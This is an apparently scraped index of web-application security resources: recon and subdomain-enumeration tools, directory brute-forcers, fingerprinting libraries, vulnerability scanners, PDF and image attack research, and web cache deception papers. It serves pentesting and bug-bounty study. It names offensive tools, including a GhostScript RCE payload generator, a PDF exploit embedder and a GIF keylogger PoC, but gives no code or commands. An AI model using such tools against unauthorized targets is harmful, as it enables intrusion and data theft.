- Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- Asynchronous Vulns
- AuthN Testing
- Articles/Blogposts/Writeups
- Tools
- AuthCov
- AuthCov crawls your web application using a Chrome headless browser while logged in as a pre-defined user. It intercepts and logs API requests as well as pages loaded during the crawling phase. In the next phase it logs in under a different user account, the "intruder", and attempts to access each of one of the API requests or pages discovered previously. It repeats this step for each intruder user defined. Finally it generates a detailed report listing the resources discovered and whether or not they are accessible to the intruder users.
- AuthCov
- Out-of-Band Attacks
- Using Browser Devtools for testing
- Chrome DevTools - Google
- I don’t need no proxy - Pentesterlab
- Sending real-time browsing data directly to fuzzers from Chrome remote debugging
- Writeups of techniques
- General Reconnaissance Techniques
- General Articles/Methodology Writeups
- Just another Recon Guide for Pentesters and Bug Bounty Hunters - @slashcrypto(2020)
- Turbo Intruder: Embracing the billion-request attack - James Kettle(2020)
- Bug Bounty Methodology…Just Have a Look.! - Naveenroy(2020)
- ReconNotes - bminossi
- The Bug Hunter's Methodology (TBHM)
- Simple Recon Methodology - Eslam Aki(2020)
- zeroc00I/ReconNotes
- "Just some public notes that can be useful and i want let the world knows."
- Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters - Ahmad Halabi(2021)
- How to achieve enterprise-grade attack-surface monitoring with open source software - hakluke(2021)
- Attack Surface Management. You’re (probably) doing it wrong. - Steve Micallef(2021)
- Attacking the Perimeter - Miguel Martinez(2020)
- epi052/recon-pipeline
- How to Build an Automated Recon Pipeline with Python and Luigi - Part I (Setup and Scope) - epi052
- Application Enumeration Tips using Aquatone and Burp Suite - Ryan Wendell(2019)
- The Anti-Recon Recon Club (using ReconFTW) - jhaddix
- It's the little things - Jon Bottarini(Disobey 2018)
- Tools that didn't fit elsewhere
- webgrep
- This self-contained tool relies on the well-known grep tool for grepping Web pages. It binds nearly every option of the original tool and also provides additional features like deobfuscating Javascript or appyling OCR on images before grepping downloaded resources.
- webgrep
- (Almost)Fully Automating Recon
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Mechanizing the Methodology : Automating Discovery, Testing, and Alerting using Recon/Testing Tools and Amazon SES - Daniel Miessler(Defcon Safemode RTV2020)
- There are a million techniques out there for finding new attack surface and finding potential vulnerabilities; the problem is finding the time to run your entire methodology against all your targets. This talk will take you through finding new attack surface, performing multiple types of test against those targets, and sending real-time alerts---all on a continuous basis using automation from a cloud-based Linux host.
- Writeup/Review by Clint Gibler(recommend reading)
- Mechanizing the Methodology : Automating Discovery, Testing, and Alerting using Recon/Testing Tools and Amazon SES - Daniel Miessler(Defcon Safemode RTV2020)
- Tools
- chomp-scan
- A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.
- chomp-scan
- Attack Surface Reconaissance
- Articles/Blogposts/Writeups
- Asset Enumeration: Expanding a Target's Attack Surface - Capt. Meelo
- What's in a Domain Name? - Collin Meadows(SecureWV/Hack3rcon2018)
- The domain name is one of the most prominent assets an organization can have. While customers can discover an organization from many sources - social media, review aggregators, advertisements, etc - the webpage is often the first direct experience a person has with a business and brand. This vital role makes the domain a target for fraud, data leakage, and cyber attack. Implementing domain monitoring and performing risk assessments is important, but only half the battle. In this talk, we will consider amount of intelligence one can gather starting from only a domain name and investigate how this sets an attacker up with an ideal blueprint for malicious action.
- Basic Recon Using A Domain Name - Cedric Owens(2020)
- Tools
- AttackSurfaceMapper
- Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intellgence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, Other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
- intrigue-core
- Intrigue-core is a framework for external attack surface discovery and automated OSINT.
- Domain Analyzer
- Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
- domain-profiler
- domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
- The Hamburglar
- Hamburglar -- collect useful information from urls, directories, and files
- AutoRecon
- Simple shell script for automated domain recognition with some tools
- AutoRecon for Automated Reconnaissance - Ahmed Elsobky
- Websy
- Keep an eye on your targets with Websy to get quickly notified for any change they push on their Web Server
- BlueEye
- Blue Eye is a python Recon Toolkit script. It shows subdomain resolves to the IP addresses, company email addresses and much more ..!
- FinalRecon
- "FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple."
- changedetection.io
- "The best and simplest self-hosted free open source website change detection, monitor and notification service."
- KENZER - Automated web assets enumeration & scanning
- webstor
- "A script to quickly enumerate all websites across all of your organization's networks, store their responses, and query for known web technologies, such as those with zero-day vulnerabilities."
- cariddi
- Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more
- Crossfeed
- Crossfeed is a tool that continuously enumerates and monitors an organization's public-facing attack surface in order to discover assets and flag potential security flaws. By operating in either passive or active scanning modes, Crossfeed collects data from a variety of open source tools and data feeds to provide actionable information about organization assets. Crossfeed is offered as a self-service portal and allows customers to view reports and customize scans performed.
- kunyu
- Kunyu aims to make corporate asset collection more efficient and enable more security-related practitioners to understand and use cyberspace surveying and mapping technology.
- AttackSurfaceMapper
- Nuclei
- 101
- Nuclei
- Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.
- Nuclei
- Articles
- The Ultimate Guide to Finding Bugs With Nuclei - ProjectDiscovery(2022)
- Nuclei Templating Guide - ProjectDiscovery
- Nuclei Templates
- Community curated list of templates for the nuclei engine to find security vulnerabilities.
- Creating Custom Nuclei Templates and Workflows - JTCSEC(2021)
- A walkthrough for how to create a Nuclei template and turn it into a workflow. This is my first piece of content, so and feedback is greatly appreciated! If you have any suggestions for new things to cover, let me know!
- How-to-write-your-First-Nuclei-Template.pdf - DhiyaneshGeek
- Nuclei Templates Creation – My Experience - AndySvints(2021)
- Templates
- Virtual-Host
- Modified Nuclei Templates Version to FUZZ Host Header
- Virtual-Host
- 101
- Articles/Blogposts/Writeups
- Browser Automation
- playwright
- Node.js library to automate Chromium, Firefox and WebKit with a single API
- playwright
- Browser/Client Fingerprinting(see Also AnonOpSecPrivacy.md)
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Passive Fingerprinting of HTTP/2 Clients - Ory Segal, Aharon Fridman, Elad Shuster(2017)
- Two New Ways To Exploit A Fixed Browser Fingerprinting Flaw - Xiaoyin Liu(BSidesMunic(2019)
- QCSD: A QUIC Client-Side Website-Fingerprinting Defence Framework - Jean-Pierre Smith, Luca Dolfi, Prateek Mittal, Adrian Perrig(2022)
- "We observe that the rapid and wide-spread deployment of QUIC and HTTP/3 creates an exciting opportunity to build website-fingerprinting defences directly into client applications, such as browsers, without requiring any changes to web servers, VPNs, or the deployment of new network services. We therefore design and implement the QCSD framework, which leverages QUIC and HTTP/3 to emulate existing website-fingerprinting defences by bidirectionally adding cover traffic and reshaping connections solely from the client. As case studies, we emulate both the FRONT and Tamaraw defences solely from the client and collected several datasets of live-defended traffic on which we evaluated modern machine-learning based attacks. Our results demonstrate the promise of this approach in shaping connections towards client-orchestrated defences, thereby removing a primary barrier to the deployment of website-fingerprinting defences."
- Papers
- Tools
- CSS-Fingerprint
- An experimental method for CSS based fingerprinting and a pure CSS 'supercookie'.
- Sniffer
- Sniffer is a browser/engine/os/device detection tool. Works both in a browser and with Node.
- FingerprintJS
- FingerprintJS is a browser fingerprinting library that queries browser attributes and computes a hashed visitor identifier from them. Unlike cookies and local storage, a fingerprint stays the same in incognito/private mode and even when browser data is purged. FingerprintJS is 100% open-source, but its accuracy is limited because it's only a client-side library without a backend.
- TorZillaPrint
- TorZillaPrint (TZP) aims to provide a comprehensive, all-in-one, fingerprinting test suite, nicely broken into suitable sections with relevant information together. Long term, the goal is to collect Gecko only fingerprint data (no PII) for analysis to see how many classifications each metric or section provides.
- CSS-Fingerprint
- Browser-based Port Scan
- DNS
- See Network_Attacks.md -> DNS
- Endpoint Discovery
- Articles/Blogposts/Writeups
- Improving Internet Wide Scanning with Dynamic Scanning - Alexandre Dulaunoy(2021)
- HTTP Route BustingEnumerating Routes Instead of Directories - Dejan Zelic
- Offensive Recon - Bug Hunter's Playbook - Harsh Bothra(2020)
- "Harsh Bothra is a security researcher and ranked as Bugcrowd Top 150 Hackers and MVP for 2020 Q1. He delivered this talk on offensive Recon."
- Bypassing the Redirect filters with 7 ways - elmahdi(2020)
- Tools
- JSParser
- A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
- LinkFinder
- LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing. Resulting in new testing ground, possibility containing new vulnerabilities. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
- relative-url-extractor
- During reconnaissance (recon) it is often helpful to get a quick overview of all the relative endpoints in a file. These days web applications have frontend pipelines that make it harder for humans to understand minified code. This tool contains a nifty regular expression to find and extract the relative URLs in such files. This can help surface new targets for security researchers to look at. It can also be used to periodically compare the results of the same file, to see which new endpoints have been deployed. History has shown that this is a goldmine for bug bounty hunters.
- hakrawler
- Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
- Introducing Hakrawler: A Fast Web Crawler for Hackers - Luke Stephens(2020)
- endpointdiff
- endpointdiff is a simple wrapper script around LinkFinder (https://github.com/GerbenJavado/LinkFinder) to quickly identify whether endpoints have changed based on diffs of JS files.
- gau
- Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- FFUF Me - Target Practice For FFUFhttps://github.com/adamtlangley/ffufme
- This is a simple website to get you used to using ffuf against a live target
- httpx
- "httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads."
- Kiterunner
- Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also bruteforcing routes/endpoints in modern applications.
- httploot
- Blogpost
- An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.
- reconFTW
- reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities
- redscan
- Redscan is built to discover exposed assets of a company, detect misconfigurations and compliance deviations. Redscan was conceived with the idea to automate the recon phase and the vulnerability assertion as referred to the Bug Bounty Methodology.
- page-fetch
- Fetch web pages using headless Chrome, storing all fetched resources including JavaScript files. Run arbitrary JavaScript on many web pages and see the returned values
- JSParser
- Articles/Blogposts/Writeups
- Forced Browsing
- Articles/Blogposts/Writeups
- Tools
- Dirbuster
- DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
- Go Buster
- Directory/file busting tool written in Go; Recursive, CLI-based, no java runtime
- WFuzz
- Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- ffuf
- Fast web fuzzer written in Go
- Everything you need to know about FFUF - codingo(2020)
- ffuf on Steroids - securityjunky.com
- Tachyon
- Tachyon is a Fast Multi-Threaded Web Discovery Tool
- Syntribos
- Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.
- OpenDoor
- OpenDoor OWASP is console multifunctional web sites scanner. This application find all possible ways to login, index of/ directories, web shells, restricted access points, subdomains, hidden data and large backups. The scanning is performed by the built-in dictionary and external dictionaries as well. Anonymity and speed are provided by means of using proxy servers.
- rustbuster
- A Comprehensive Web Fuzzer and Content Discovery Tool
- feroxbuster
- A fast, simple, recursive content discovery tool written in Rust.
- SharpBuster
- SharpBuster is a C# implementation of a directory brute forcing tool. It's designed to be used via Cobalt Strike's execute-assembly and similar tools, when running a similar tool over a SOCKS proxy is not feasible.
- FES - Fast Endpoint Scanner
- A web application endpoint scanner written in Rust, designed to put less load on the domains it scans with parsing features to help grab the important stuff (inspired by tomnomnom's meg).
- WAES
- CPH:SEC WAES: Web Auto Enum & Scanner - Auto enums website(s) and dumps files as result
- crithit
- Website Directory and file brute forcing at extreme scale.
- snallygaster
- Finds file leaks and other security problems on HTTP servers.
- Dirbuster
- HTTP Enumeration
- Articles/Blogposts/Writeups
- Tools
- Arjun
- HTTP parameter discovery suite.
- Psi-Probe
- Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
- HTTPLeaks
- HTTPLeaks - All possible ways, a website can leak HTTP requests
- HTTPie - curl for humans
- HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
- gethead
- HTTP Header Analysis Vulnerability Tool
- Arjun
- HTTP Fingerprinting
- Articles/Blogposts/Writeups
- Tools
- GoFingerprint
- GoFingerprint is a Go tool for taking a list of target web servers and matching their HTTP responses against a user defined list of fingerprints.
- GoFingerprint
- JS-based scanning
- Articles/Blogposts/Writeups
- Exposing Intranets with reliable Browser-based Port scanning - Gareth Heyes
- In this blog post I describe how I created a port scanner using JavaScript.
- JS-Recon detailed. Analizying the internal network with a XSS - Jorge Lajara (2018)
- Scanning JS Files for Endpoints and Secrets - securityjunky.com
- Exposing Intranets with reliable Browser-based Port scanning - Gareth Heyes
- Tools
- Articles/Blogposts/Writeups
- (Sub)Domain Reconnaissance
- Articles/Blogposts/Writeups
- A penetration tester’s guide to subdomain enumeration - Bharath
- Subdomain Enumeration: 2019 Workflow - Patrik Hudak
- [The Art of Subdomain Enumeration - Patrick Hudak(2017)]https://blog.sweepatic.com/art-of-subdomain-enumeration/)
- A penetration tester’s guide to subdomain enumeration - Bharath(2017)
- Domain Discovery
- Discovering Domains via a Time-Correlation Attack on Certificate Transparency - Arseniy Sharoglazov(2022)
- DRROBOT
- Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
- assetfinder
- Find domains and subdomains potentially related to a given domain.
- Domains project
- "World’s single largest Internet domains dataset"
- ripgen
- A rust-based version of the popular dnsgen python utility.
- Finddomain
- The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, multiple API Keys for sources and much more.
- Subdomain Discovery Tools
- Sudomy
- Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way.
- domains-from-csp
- A Python script to parse domain names from CSP header
- pdlist. A passive subdomain finder
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a
hostname <something>.example.com
or URLs strictly related toexample.com
.
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a
- Find-Domains
- This repo contain scripts written for finding subdomains using various available tools
- sub-differ
- take a list of old subdomain and new subdomain and the output is the deleted subdomain and the new subdomain
- OneForAll
- subscraper
- Perform subdomain enumeration through various techniques and retrieve detailed output to aid in further testing.
- subfinder
- Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- Dome
- Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.
- Sudomy
- Articles/Blogposts/Writeups
- Javascript
- Articles/Blogposts/Writeups
- Tools
- SecretFinder
- A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript files
- SecretFinder
- Technology Identification
- Articles/Blogposts/Writeups
- Tools
- General
- wappy
- A tool to discover technologies in web applications from your terminal. It uses the wap library, that is a python implementation of the great Wappalyzer browser extension. In fact, it uses the rules defined in the file technologies.json of the Wappalyzer repository.
- wappy
- CMS
- CMSExplorer
- CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
- BlindElephant Web Application Fingerprinter
- The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
- Fingerprinter
- CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
- WPScan
- WPScan is a free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
- CMSExplorer
- Proxies
- Web Filter External Enumeration Tool (WebFEET)
- WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
- Web Filter External Enumeration Tool (WebFEET)
- Web Servers
- httprecon - Advanced Web Server Fingerprinting
- The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- httprecon - Advanced Web Server Fingerprinting
- General
- Web Scraping
- 101
- Articles/Papers/Talks/Writeups
- So you want to Scrape like the Big Boys? 🚀 - incolumitas.com(2021)
- Harden Vanilla Puppeteer
- A conceptual patch which modifies some vanilla puppeteer files to decrease detection rates.
- General
- browser-fingerprinting
- "Analysis of Bot Protection systems with available countermeasures 🚿. How to defeat anti-bot system 👻 and get around browser fingerprinting scripts 🕵️♂️ when scraping the web?"
- browser-fingerprinting
- Tools
- Puppeteer
- Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
- dvcs-ripper
- Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
- Scrapy
- An open source and collaborative framework for extracting the data you need from websites.
- Puppeteer
- Beautiful Soup
- Miscellaneous
- WeasyPrint
- WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license.
- WeasyPrint
- User Enumeration
- Articles/Blogposts/Writeups
- Tools
- WhatsMyName
- This repository has the unified data required to perform user enumeration on various websites. Content is in a JSON file and can easily be used in other projects.
- hackability
- Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
- WhatsMyName
- Virtual Hosts
- 101
- Tools
- virtual-host-discovery
- This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
- blacksheepwall
- blacksheepwall is a hostname reconnaissance tool
- VHostScan
- A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
- virtual-host-discovery
- Visual Reconnaissance
- Articles/Blogposts/Writeups
- Tools
- Snapback
- Snapback is a HTTP(s) screenshot tool written to take advantage of asynchronous threading in Nodejs. It's like EyeWitness, gowitness, and rawr, etc. but generally faster, and compatible with MacOS, Windows, and Linux.
- PowerWebShot
- A PowerShell tool for taking screenshots of multiple web servers quickly.
- HTTrack - Website Copier
- It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
- Kraken
- Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySql database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaniously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
- Eyeballer
- Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
- gowitness
- gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS is supported, with Windows support 'partially working'.
- webscreenshot
- A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
- LazyShot
- The simplest way to take an automated screenshot of given URLs. Easy installation!
- RAWR - Rapid Assessment of Web Resources
- EyeWitness
- EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- SharpWitness
- C# implementation of EyeWitness
- webDisco
- Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionallty checks for common administrative interfaces and web server misconfigurations.
- PowerWebShot
- A PowerShell tool for taking screenshots of multiple web servers quickly.
- Kraken
- Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySql database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaniously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
- electric-scan
- Electron based screenshot scanner
- EyeWitnessTheFitness
- Generate one FireProx API to be used for all your EyeWitness targets, making your enumeration both opsec-friendly and convenient.
- Snapback
- 3rd Party Hosted Tools
- VisualSiteMapper
- Visual Site Mapper is a free service that can quickly show a map of your site.
- VisualSiteMapper
- Web Page
- HTCAP
- htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.
- HTCAP
- General Articles/Methodology Writeups
- Vulnerability Scanner
- Nikto
- Spaghetti - Web Application Security Scanner
- Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment.
- skipfish
- Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
- wikto
- Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
- WATOBO
- WATABO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
- YASUO
- Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
- ParrotNG
- ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
- Arachni Web Scanner
- Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
- Pyfiscan
- Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.
- jaeles
- "powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner."
- Showcase examples of usage
- 0d1n
- 0d1n is a tool for automating customized attacks against web applications.
- reNgine
- reNgine is an automated reconnaissance framework meant for gathering information during penetration testing of web applications. reNgine has customizable scan engines, which can be used to scan the websites, endpoints, and gather information.
- Osmodeus
- Fully automated offensive security framework for reconnaissance and vulnerability scanning
- jsgifkeylogger
- a javascript keylogger included in a gif file This is a PoC
- Images
- PDFs
- 101
- Articles/Blogposts/Writeups
- Export Injection - Inon Shkedy(2018)
- Postscript Pat and His Black and White Hat - Steven Seeley(2019)
- How To Spoof PDF Signatures - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2019)
- PDFex: Major Security Flaws in PDF Encryption - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2019)
- Ghostscript SAFER Sandbox Breakout (CVE-2020-15900) - Tim Goddard(2020)
- Portable Data exFiltration: XSS for PDFs - Gareth Hayes(2020)
- Insecure Features in PDFs - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2021)
- Talks/Presentations/Videos
- HotPics 2021 - Emil Lerner(ZeroNights2021)
- Slides
- Emil Lerner considers the current state of the web application attack vector via image conversion. What configurations are still vulnerable, and how to make sure that notifications about potential RCEs are (almost) automatically sent to your Telegram account? As a bonus, there are bug-bounty stories. One is more interesting than another.
- HotPics 2021 - Emil Lerner(ZeroNights2021)
- Tools
- RCE-0-day-for-GhostScript-9.50
- RCE 0-day for GhostScript 9.50 - Payload generator
- Ghostinthepdf
- This is a small tool that helps to embed a PostScript file into a PDF in a way that GhostScript will run the PostScript code during the PDF processing. The goal of the embedding is to run exploits against GhostScript. The output file is a semi-correct PDF that should bypass most signature checks. Thus, if you have an exploit that bypasses -dSAFER, you can "embed" it into a PDF using this tool and upload the resulting file to the target.
- RCE-0-day-for-GhostScript-9.50
- See 'Forced-Browsing'
- Web Cache Deception Attack
- 101
- Articles/Blogposts/Writeups
- Papers
- Cached and Confused: Web Cache Deception in the Wild - Seyed Ali Mirheidari, Sajjad Arshad, Kaan Onarlioglu, Bruno Crispo, Engin Kirda, William Robertson(2020)
- Web cache deception (WCD) is an attack proposed in 2017, where an attacker tricks a caching proxy into erroneously storing private information transmitted over the Internet and subsequently gains unauthorized access to that cached data. Due to the widespread use of web caches and, in particular, the use of massive networks of caching proxies deployed by content distribution network (CDN) providers as a critical component of the Internet, WCD puts a substantial population of Internet users at risk. We present the first large-scale study that quantifies the prevalence of WCD in 340 high-profile sites among the Alexa Top 5K. Our analysis reveals WCD vulnerabilities that leak private user data as well as secret authentication and authorization tokens that can be leveraged by an attacker to mount damaging web application attacks. Furthermore, we explore WCD in a scientific framework as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique used make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable two years after the public disclosure of WCD. Our empirical experiments with popular CDN providers underline the fact that web caches are not plug & play technologies. In order to mitigate WCD, site operators must adopt a holistic view of their web infrastructure and carefully configure cache settings appropriate for their applications.
- Cached and Confused: Web Cache Deception in the Wild - Seyed Ali Mirheidari, Sajjad Arshad, Kaan Onarlioglu, Bruno Crispo, Engin Kirda, William Robertson(2020)
- Talks/Presentations/Videos
- Web Cache Deception Attack - Omer Gil(BHUSA 2017)
- slides
- Web Cache Deception attack is a new web attack vector that puts various technologies and frameworks at risk. By manipulating behaviors of web servers and caching mechanisms, anonymous attackers can expose sensitive information of authenticated application users, and in certain cases to even take control over their accounts.
- Web Cache Deception attack: A new web attack vector -
- Cached and Confused: Web Cache Deception in the Wild - Seyed Ali Mirheidari, Sajjad "JJ" Arshad(h@ckivitycon 2020)
